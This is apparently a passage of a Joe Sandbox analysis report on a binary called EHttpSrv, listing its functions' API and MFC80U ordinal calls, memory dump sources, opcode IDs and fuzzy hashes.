                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578$#310freememset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2345624133-0
                                                                                                                • Opcode ID: c5c49032eacd65ffb0fba4c6bfb47e0403574072856f95f4a8a5a6116a251bd9
                                                                                                                • Instruction ID: 2dc2b5980879ddb9e75c8cf977c6fce2ff5e67cbf9f60d5e2776d79c249a8b46
                                                                                                                • Opcode Fuzzy Hash: c5c49032eacd65ffb0fba4c6bfb47e0403574072856f95f4a8a5a6116a251bd9
                                                                                                                • Instruction Fuzzy Hash: 51A160715087409FD321DF64CC85A9FBBE8BF98748F10892DF59597290DB78AA08CF92
                                                                                                                APIs
                                                                                                                • #6232.MFC80U(00000001,?,2045BB76,00000000), ref: 2045BC95
                                                                                                                • #2651.MFC80U(000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BCAA
                                                                                                                • #2155.MFC80U(000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BCB1
                                                                                                                • #2651.MFC80U(000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BCDD
                                                                                                                • #2155.MFC80U(000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BCE4
                                                                                                                • #2651.MFC80U(000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD0D
                                                                                                                • #2155.MFC80U(000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD14
                                                                                                                • #2651.MFC80U(0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD3D
                                                                                                                • #2155.MFC80U(0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD44
                                                                                                                • #2651.MFC80U(0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD6D
                                                                                                                • #2155.MFC80U(0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD74
                                                                                                                • #2651.MFC80U(000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BD9D
                                                                                                                • #2155.MFC80U(000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001,?,2045BB76,00000000), ref: 2045BDA4
                                                                                                                • #2651.MFC80U(000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001), ref: 2045BDCD
                                                                                                                • #2155.MFC80U(000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA,?,00000001), ref: 2045BDD4
                                                                                                                • #2651.MFC80U(00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA), ref: 2045BDFD
                                                                                                                • #2155.MFC80U(00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000,000004FA), ref: 2045BE04
                                                                                                                • #2651.MFC80U(0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000), ref: 2045BE2D
                                                                                                                • #2155.MFC80U(0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000,000004E7,00000000), ref: 2045BE34
                                                                                                                • #2651.MFC80U(00000511,00000000,0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000), ref: 2045BE5D
                                                                                                                • #2155.MFC80U(00000511,00000000,0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000,000004DA,00000000), ref: 2045BE64
                                                                                                                • #2651.MFC80U(000004D9,00000000,00000511,00000000,0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000), ref: 2045BE8D
                                                                                                                • #2155.MFC80U(000004D9,00000000,00000511,00000000,0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000,0000042B,00000000), ref: 2045BE94
                                                                                                                • #2651.MFC80U(000003F7,00000000,000004D9,00000000,00000511,00000000,0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000), ref: 2045BEBD
                                                                                                                • #2155.MFC80U(000003F7,00000000,000004D9,00000000,00000511,00000000,0000041A,00000000,00000418,00000000,000004FC,00000000,000004FB,00000000,0000042C,00000000), ref: 2045BEC4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651$#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 793604035-0
                                                                                                                • Opcode ID: ca8e1ed99d81f434f37c292f8f8f875fe7784e7371d240e8cad493a35e0ae36c
                                                                                                                • Instruction ID: 38f6c668d6cd52d4b7cd920b451560f76b3907829b54d84714045b9418710d8b
                                                                                                                • Opcode Fuzzy Hash: ca8e1ed99d81f434f37c292f8f8f875fe7784e7371d240e8cad493a35e0ae36c
                                                                                                                • Instruction Fuzzy Hash: 77510EB0744600DFEA1287A48812BFE35F5EBA1B04F40C57DB6468B6E0DBBC9C86C785
                                                                                                                APIs
                                                                                                                • #347.MFC80U(FEEA6C22), ref: 20433802
                                                                                                                • #1270.MFC80U(?,FEEA6C22), ref: 20433818
                                                                                                                • #2521.MFC80U(?,?,FEEA6C22), ref: 20433826
                                                                                                                • #347.MFC80U(?,?,FEEA6C22), ref: 2043382F
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 2043383E
                                                                                                                • #1270.MFC80U(00000000), ref: 20433849
                                                                                                                • LPtoDP.GDI32(?,?,00000002), ref: 2043385A
                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 20433895
                                                                                                                • #1271.MFC80U(00000000), ref: 204338A0
                                                                                                                • #5633.MFC80U(?,?,00000000), ref: 204338AF
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 204338BE
                                                                                                                • #2362.MFC80U(00000000), ref: 204338C5
                                                                                                                • #5638.MFC80U(00000000,00000000), ref: 204338CF
                                                                                                                • GetMapMode.GDI32(?,00000000,00000000), ref: 204338DD
                                                                                                                • #5884.MFC80U(00000000), ref: 204338E8
                                                                                                                • GetBkColor.GDI32(?), ref: 204338F2
                                                                                                                • #5723.MFC80U(00000000), ref: 204338FD
                                                                                                                • DPtoLP.GDI32(?,?,00000002), ref: 2043390E
                                                                                                                • #6058.MFC80U(?,?,?), ref: 20433927
                                                                                                                  • Part of subcall function 20432000: GetClientRect.USER32(?,?), ref: 20432013
                                                                                                                  • Part of subcall function 20432000: GetParent.USER32(?), ref: 2043201D
                                                                                                                  • Part of subcall function 20432000: #2366.MFC80U(00000000), ref: 20432024
                                                                                                                  • Part of subcall function 20432000: GetTextColor.GDI32(?), ref: 20432076
                                                                                                                  • Part of subcall function 20432000: #2362.MFC80U(00000000), ref: 20432085
                                                                                                                  • Part of subcall function 20432000: FillRect.USER32(?,?,00000000), ref: 2043209C
                                                                                                                  • Part of subcall function 20432000: InflateRect.USER32(?,000000FE,00000000), ref: 204320DC
                                                                                                                  • Part of subcall function 20432000: #5727.MFC80U(00000001), ref: 20432108
                                                                                                                  • Part of subcall function 20432000: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20432129
                                                                                                                  • Part of subcall function 20432000: #2362.MFC80U(00000000), ref: 20432130
                                                                                                                  • Part of subcall function 20432000: #764.MFC80U(?), ref: 2043214F
                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 2043395F
                                                                                                                • #5638.MFC80U(FEEA6C22), ref: 2043396E
                                                                                                                • #5633.MFC80U(?,00000000,FEEA6C22), ref: 20433980
                                                                                                                • #1957.MFC80U(?,00000000,FEEA6C22), ref: 20433989
                                                                                                                • #602.MFC80U(?,00000000,FEEA6C22), ref: 204339B2
                                                                                                                • #602.MFC80U(?,00000000,FEEA6C22), ref: 204339C3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2362Rect$#1270#347#5633#5638#602ColorCompatibleCreateMessageSend$#1271#1957#2366#2521#5723#5727#5884#6058#764BitmapClientFillInflateModeParentText
                                                                                                                • String ID:
                                                                                                                • API String ID: 460726100-0
                                                                                                                • Opcode ID: 983a7ba65ae64c1b04ff5d34bf4deebc936cefbe968e1a89bbeec2a3a1087208
                                                                                                                • Instruction ID: d6db3167796e3342b51db567698fae97f9d31cccc33f840bdf94e3c8e033f85d
                                                                                                                • Opcode Fuzzy Hash: 983a7ba65ae64c1b04ff5d34bf4deebc936cefbe968e1a89bbeec2a3a1087208
                                                                                                                • Instruction Fuzzy Hash: 6E51FC71108340AFC304DBA4C895EAFBBF9AF99A54F408A1DF59693260DB75E904CB62
                                                                                                                APIs
                                                                                                                • #764.MFC80U(CCCCCCCC,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20414FB3
                                                                                                                • #764.MFC80U(CCCCCCCC,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20414FCF
                                                                                                                • #764.MFC80U(B27AE934,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20414FF1
                                                                                                                • #764.MFC80U(E95CC083,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 2041500A
                                                                                                                • #764.MFC80U(E8C833FC,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20415026
                                                                                                                • #764.MFC80U(84050445,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20415048
                                                                                                                • #764.MFC80U(F9B36FE9,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20415061
                                                                                                                • #764.MFC80U(00C00504,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 2041507D
                                                                                                                • #764.MFC80U(FFF9B4F8,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 204150A2
                                                                                                                • #764.MFC80U(49BA00B8,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 204150C7
                                                                                                                • qsort.MSVCR80 ref: 20415100
                                                                                                                • qsort.MSVCR80 ref: 2041515C
                                                                                                                • qsort.MSVCR80 ref: 20415186
                                                                                                                • qsort.MSVCR80 ref: 204151AE
                                                                                                                • qsort.MSVCR80 ref: 20415212
                                                                                                                • qsort.MSVCR80 ref: 2041523C
                                                                                                                • qsort.MSVCR80 ref: 20415266
                                                                                                                • qsort.MSVCR80 ref: 2041529D
                                                                                                                • qsort.MSVCR80 ref: 204152D4
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20415326
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20415393
                                                                                                                • #265.MFC80U(00000000,FEEA6C22,?,00000001,?,?,?,00000000,2047D118,000000FF), ref: 20415403
                                                                                                                • wcscpy_s.MSVCR80 ref: 20415468
                                                                                                                • wcsncpy_s.MSVCR80 ref: 20415479
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$qsort$#265$wcscpy_swcsncpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 1349739470-0
                                                                                                                • Opcode ID: 0d64cb7775e3551ef22c9dbd3f46ef24d3e0b69c6ce68da3e20f114f03e825c8
                                                                                                                • Instruction ID: a5f4eebaf3f9ca9ad693deaebe895098fcba689132a65306b19b38adc85e5150
                                                                                                                • Opcode Fuzzy Hash: 0d64cb7775e3551ef22c9dbd3f46ef24d3e0b69c6ce68da3e20f114f03e825c8
                                                                                                                • Instruction Fuzzy Hash: 96224AB0500288CBDB24CF69CC81BDAFBE5FF94304F548A1AE8599B361D779A944CF51
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,?), ref: 2044A728
                                                                                                                • #2310.MFC80U(?,00000251,00000000,?,00000022), ref: 2044A7C2
                                                                                                                • #2310.MFC80U(?,00000252,?), ref: 2044A7D8
                                                                                                                • #896.MFC80U(?), ref: 2044A7E9
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 2044A7F6
                                                                                                                • #2310.MFC80U(?,00000253,?,?,00000001), ref: 2044A894
                                                                                                                • #2310.MFC80U(?,0000025A,00000000,00000001), ref: 2044A8B1
                                                                                                                • #896.MFC80U(?), ref: 2044A8C2
                                                                                                                • #2310.MFC80U(?,00000254,-00000022,?,00000001), ref: 2044A96C
                                                                                                                • #896.MFC80U(?), ref: 2044A99C
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 2044A9A9
                                                                                                                • #2310.MFC80U(?,00000255,00000000,?,00000022), ref: 2044A9E7
                                                                                                                • #2310.MFC80U(?,00000256,?), ref: 2044AA08
                                                                                                                • #896.MFC80U(?), ref: 2044AA18
                                                                                                                • #2310.MFC80U(?,00000257,00000000,?,00000022), ref: 2044AA58
                                                                                                                • #2310.MFC80U(?,00000258,?), ref: 2044AA75
                                                                                                                • #896.MFC80U(?), ref: 2044AA8B
                                                                                                                • #2310.MFC80U(00000000,0000024F,?,?,?,00000000,?,00000040,00000000,?,?,00000040), ref: 2044AAEE
                                                                                                                • #896.MFC80U(?), ref: 2044AAFA
                                                                                                                • #2310.MFC80U(00000000,0000025C,?,?,?,00000000,?,00000040,?,FEEA6C22,?,00000040), ref: 2044AB5D
                                                                                                                • #896.MFC80U(?), ref: 2044AB69
                                                                                                                • #899.MFC80U(2048E708), ref: 2044AB87
                                                                                                                • #578.MFC80U ref: 2044ABA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2310$#896$CriticalSection$#310#578#899EnterLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 4130951986-0
                                                                                                                • Opcode ID: b1147bb1563f37cf7285035b7fd7db4f8b55f7d2235472b3e4c9c79b311805a9
                                                                                                                • Instruction ID: a811e24446e8cac0382d96524549a7915c51330605ecd9f09f3ceb3af9ebd86a
                                                                                                                • Opcode Fuzzy Hash: b1147bb1563f37cf7285035b7fd7db4f8b55f7d2235472b3e4c9c79b311805a9
                                                                                                                • Instruction Fuzzy Hash: C2E180B15083419FD714DF54CC88AABB7E9FF88705F00892DF98597291EB78E908DB92
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,20462D02), ref: 204127D9
                                                                                                                • #764.MFC80U(?,?,20462D02), ref: 204127EA
                                                                                                                • #764.MFC80U(?,?,20462D02), ref: 204127FB
                                                                                                                • #764.MFC80U(?,?,20462D02), ref: 2041280C
                                                                                                                • #764.MFC80U(?,?,?), ref: 204128D9
                                                                                                                • #764.MFC80U(?,?,?), ref: 204128EA
                                                                                                                • #764.MFC80U(?,?,?), ref: 204128FB
                                                                                                                • #764.MFC80U(?,?,?), ref: 20412910
                                                                                                                • #1176.MFC80U ref: 2041291D
                                                                                                                  • Part of subcall function 20402000: wcscpy_s.MSVCR80 ref: 20402038
                                                                                                                  • Part of subcall function 20402000: wcsncpy_s.MSVCR80 ref: 20402049
                                                                                                                  • Part of subcall function 20411460: #764.MFC80U(2040FAB2,OPTNAME,?,2041266B,?,?,?,?,?,?,?,?,?,00000000), ref: 2041146E
                                                                                                                  • Part of subcall function 20411460: #265.MFC80U(00000000,OPTNAME,?,2041266B,?,?,?,?,?,?,?,?,?,00000000), ref: 204114A9
                                                                                                                  • Part of subcall function 204115E0: #764.MFC80U(?,GROUP,?,2041268F,?,?,?,?,?,?,?,?,?,?,00000000), ref: 204115EE
                                                                                                                  • Part of subcall function 204115E0: #265.MFC80U(00000000,GROUP,?,2041268F,?,?,?,?,?,?,?,?,?,?,00000000), ref: 20411629
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#265$#1176wcscpy_swcsncpy_s
                                                                                                                • String ID: DESC$GROUP$HIDDEN$OPTION$OPTIONS$OPTNAME$RULES$SETTINGS$TYPE$VALUE$ZONES
                                                                                                                • API String ID: 3313864260-3008686698
                                                                                                                • Opcode ID: 98939082490f85a1252ed007cb1178642c6058a1864723474fc795d27a62f70c
                                                                                                                • Instruction ID: cb406057bfc46c322035887182083016b808ff50fb98b63f0dd9d78b873e5502
                                                                                                                • Opcode Fuzzy Hash: 98939082490f85a1252ed007cb1178642c6058a1864723474fc795d27a62f70c
                                                                                                                • Instruction Fuzzy Hash: 3FC1B2B16043409BD710DBA4C981B4BF7E8AF94A48F00C92DFD89D7351E639EA95CB93
                                                                                                                APIs
                                                                                                                • #310.MFC80U(?,FEEA6C22,?,?,00000001,FEEA6C22), ref: 2044757B
                                                                                                                • #4026.MFC80U(000000B8,?,00000001,FEEA6C22), ref: 2044758D
                                                                                                                  • Part of subcall function 20426370: #416.MFC80U(?,?,?,?,000000B8,FEEA6C22,?,?,?), ref: 20426431
                                                                                                                  • Part of subcall function 20426370: #762.MFC80U(00000120,?,?,?,?,000000B8,FEEA6C22,?,?,?), ref: 20426474
                                                                                                                  • Part of subcall function 20426370: #977.MFC80U(?), ref: 204264C2
                                                                                                                  • Part of subcall function 20426370: #977.MFC80U(?,?), ref: 204264CA
                                                                                                                  • Part of subcall function 20426370: #977.MFC80U(?,?,?), ref: 204264D8
                                                                                                                • socket.WS2_32(00000017,00000001,00000006), ref: 204475B6
                                                                                                                • closesocket.WS2_32(00000000), ref: 204475C2
                                                                                                                  • Part of subcall function 20416820: #764.MFC80U(C483FFFF,NAME,?,2041A524,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 20416833
                                                                                                                  • Part of subcall function 20416820: #265.MFC80U(00000000,?,NAME,?,2041A524,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 2041688A
                                                                                                                  • Part of subcall function 20417B70: #764.MFC80U(?,76945540,2044727B), ref: 20417B7E
                                                                                                                  • Part of subcall function 20417B70: #764.MFC80U(?,76945540,2044727B), ref: 20417BA3
                                                                                                                • #2461.MFC80U(00000000), ref: 2044761E
                                                                                                                • #5524.MFC80U(0000005C), ref: 20447635
                                                                                                                • #310.MFC80U ref: 20447640
                                                                                                                • #5558.MFC80U(?,-00000001), ref: 2044765E
                                                                                                                • #2310.MFC80U(?,0000011C), ref: 20447674
                                                                                                                • #578.MFC80U(?,?,00000001,FEEA6C22), ref: 20447687
                                                                                                                • #3990.MFC80U(?,000000FF,?,?,00000001,FEEA6C22), ref: 204476A9
                                                                                                                • #774.MFC80U(00000000,?,?,00000001,FEEA6C22), ref: 204476B7
                                                                                                                • #578.MFC80U(?,?,00000001,FEEA6C22), ref: 204476C7
                                                                                                                • #578.MFC80U(?,?,?,00000001,FEEA6C22), ref: 204476E3
                                                                                                                • #764.MFC80U(?,FEEA6C22), ref: 20447733
                                                                                                                • #764.MFC80U(?,FEEA6C22), ref: 20447758
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?), ref: 204478D9
                                                                                                                • #578.MFC80U(00000000,?,?,?), ref: 20447913
                                                                                                                • #578.MFC80U(?,?), ref: 20447949
                                                                                                                  • Part of subcall function 20416AE0: #1176.MFC80U(?,?,20447806,?), ref: 20416AF4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578#764$#977$#310$#1176#2310#2461#265#3990#4026#416#5524#5558#762#774CriticalEnterSectionclosesocketsocket
                                                                                                                • String ID: xXH
                                                                                                                • API String ID: 2808855026-4004433314
                                                                                                                • Opcode ID: be78bb7b9a857b3a1417f9c2a055df57425b8afb2c5c391a166f3f04f36433a0
                                                                                                                • Instruction ID: 06c91e4a488b285b61ffe3b64dbe23a10200509f49b006a6806328fc123c4a12
                                                                                                                • Opcode Fuzzy Hash: be78bb7b9a857b3a1417f9c2a055df57425b8afb2c5c391a166f3f04f36433a0
                                                                                                                • Instruction Fuzzy Hash: 63D1C171900288DFDB20DFA4CD85BEE77B5AF50704F108169EC0AAB291DB786F46DB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20439510: #314.MFC80U(00000000,FEEA6C22), ref: 20439547
                                                                                                                  • Part of subcall function 20439510: #6751.MFC80U(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,2047DED8), ref: 20439588
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 20442452
                                                                                                                  • Part of subcall function 2042E670: #6751.MFC80U(00000000,?,2042E5B8,00000000,FEEA6C22), ref: 2042E688
                                                                                                                • EnterCriticalSection.KERNEL32(?,FEEA6C22), ref: 2044253B
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 2044254A
                                                                                                                • #310.MFC80U ref: 20442703
                                                                                                                • #310.MFC80U ref: 20442718
                                                                                                                • #310.MFC80U ref: 2044272A
                                                                                                                • #314.MFC80U(00000000), ref: 20442742
                                                                                                                • #4026.MFC80U(00000101,00000000), ref: 20442758
                                                                                                                • #4026.MFC80U(00000123), ref: 20442767
                                                                                                                • #4026.MFC80U(00000214), ref: 20442776
                                                                                                                • #578.MFC80U ref: 204427B9
                                                                                                                • #578.MFC80U ref: 204427CB
                                                                                                                • #578.MFC80U ref: 204427E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#314#4026#578$#6751CriticalSection$EnterLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 1393448212-0
                                                                                                                • Opcode ID: a06811e997a4cc11b27affd7d612fee91356a553c5247e14fad2327ef2611812
                                                                                                                • Instruction ID: e2d4fec908829ee6fa6f350fe3cd3d5545ec75d492f97970bbd7c4ea08f16d57
                                                                                                                • Opcode Fuzzy Hash: a06811e997a4cc11b27affd7d612fee91356a553c5247e14fad2327ef2611812
                                                                                                                • Instruction Fuzzy Hash: B3E1E17260C3408FD320DF68D8C579AF7E0FBA4715F508A2EE985873A0DB399944CB92
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,00000000,?,00000000,2047D078,000000FF,2041A38A,20462D01,?), ref: 204154F4
